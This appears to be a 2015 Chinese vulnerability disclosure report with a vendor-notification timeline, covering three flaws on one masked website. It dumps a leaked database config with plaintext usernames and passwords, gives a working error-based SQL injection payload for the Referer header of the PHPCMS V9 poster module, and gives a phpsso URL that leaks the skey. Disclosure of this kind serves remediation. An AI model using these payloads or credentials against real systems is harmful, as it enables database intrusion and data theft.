2015-08-17: 细节已通知厂商并且等待厂商处理中 2015-08-15: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-08-25: 细节向核心白帽子及相关领域专家公开 2015-09-04: 细节向普通白帽子公开 2015-09-14: 细节向实习白帽子公开 2015-09-29: 细节向公众公开
RT（如题：以下为该站点三处漏洞的细节）
# 1：SVN 信息泄露导致数据库敏感信息泄露。站点根目录下的 .svn/entries 可被直接访问：http://**.**.**.**/.svn/entries http://**.**.**.**/.svn/entries 。由此取得的配置文件中含有多个数据库的主机、账号与明文密码（见下），其中包括 root 账号及 123456 这类弱口令；修复时除了禁止 Web 访问 .svn 目录外，还应轮换这些已泄露的凭据。
/*主表配置*/ 'DB'=>array( 'main'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=sdk_dev', 'masterRead' => false, //从库无效时 从主库读取 'username' => 'sdk_dev', 'password' => 'sdk_dev@2014', 'charset' => 'utf8', 'tablePrefix' => '', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=sdk_dev', 'slavesWrite' => false, 'username' => 'sdk_dev', 'password' => 'sdk_dev@2014', 'charset' => 'utf8', 'tablePrefix' => '', ), ), //其他库 'localhost'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=wiki', 'masterRead' => true, 'username' => 'root', 'password' => '123456', 'charset' => 'utf8', 'tablePrefix' => 'wiki_', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=wiki', 'slavesWrite' => true, 'username' => 'root', 'password' => '123456', 'charset' => 'utf8', 'tablePrefix' => 'wiki_', ), ), //251 'test251'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=wiki', 'masterRead' => true, 'username' => 'chenchao', 'password' => '123456', 'charset' => 'utf8', 'tablePrefix' => 'wiki_', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=wiki', 'slavesWrite' => true, 'username' => 'chenchao', 'password' => '123456', 'charset' => 'utf8', 'tablePrefix' => 'wiki_', ), ), //251 'cskl251'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=cskl', 'masterRead' => true, 'username' => 'chenchao', 'password' => '123456', 'charset' => 'utf8', 'tablePrefix' => '', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;dbname=cskl', 'slavesWrite' => true, 'username' => 'chenchao', 'password' => '123456', 'charset' => 'utf8', 'tablePrefix' => '', ), ), 'jorgame'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;port=8904;dbname=sdklog', 'masterRead' => true, 'username' => 'root', 'password' => 'zr_123', 'charset' => 'utf8', 'tablePrefix' => '', ), 'master'=>array( 'connectionString' => 
'mysql:host=**.**.**.**;port=8904;dbname=sdklog', 'masterRead' => true, 'username' => 'root', 'password' => 'zr_123', 'charset' => 'utf8', 'tablePrefix' => '', ), ), 'jorgamecom'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;port=8904;dbname=sdkcom', 'masterRead' => true, 'username' => 'root', 'password' => 'zr_123', 'charset' => 'utf8', 'tablePrefix' => '', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;port=8904;dbname=sdkcom', 'masterRead' => true, 'username' => 'root', 'password' => 'zr_123', 'charset' => 'utf8', 'tablePrefix' => '', ), ), 'tianxiangios'=>array( 'slaves'=>array( 'connectionString' => 'mysql:host=**.**.**.**;port=4302;dbname=andsdk', 'masterRead' => true, 'username' => 'root', 'password' => 'GYqoNsfPBlkAcVczTw', 'charset' => 'utf8', 'tablePrefix' => '', ), 'master'=>array( 'connectionString' => 'mysql:host=**.**.**.**;port=4302;dbname=andsdk', 'masterRead' => true, 'username' => 'root', 'password' => 'GYqoNsfPBlkAcVczTw', 'charset' => 'utf8', 'tablePrefix' => '', ), ), ), /*视图配置*/ 'TEMPLATE'=>array( //smarty模板 'smarty' => array( 'TEMPLATE_PATH'=> APP_PATH.'/vendors/smarty/libs/Smarty.class.php', 'CONF_INFO'=>array( 'template_dir' => APP_PATH.'/application/views/default', #模板目录 'compile_dir' => APP_PATH.'/__runtime/script', #编译目录 'cache_dir' => APP_PATH.'/__runtime/html', 'left_delimiter' => '<{', 'right_delimiter' => '}>', 'allow_php_tag' => true, 'caching'=>false, 'cache_lifetime'=>100, ) ), ),
# 2：PHPCMS V9 poster 模块（m=poster&c=index&a=poster_click）的 Referer 头 SQL 注入。URL：http://**.**.**.**//index.php?m=poster&c=index&a=poster_click&id=1 ，请求头 Referer 设为：',(SELECT 1 FROM(SELECT COUNT(*),CONCAT(user(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a),'1')# 。该 payload 为基于报错（COUNT/GROUP BY 重复键）的注入，报错信息中会回显 user() 的结果。
# 3：phpsso 的 skey 泄露。http://**.**.**.**/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ 。乌云已有相关的利用文章，这里不再演示：http://**.**.**.**/bugs/wooyun-2015-0105242 。该去吃饭了~~
综上（以上三处漏洞相互独立，均可单独利用）。
厂商回复：自查
危害等级:高
漏洞Rank:15
确认时间:2015-08-15 18:08
感谢对我们安全工作的关心!
暂无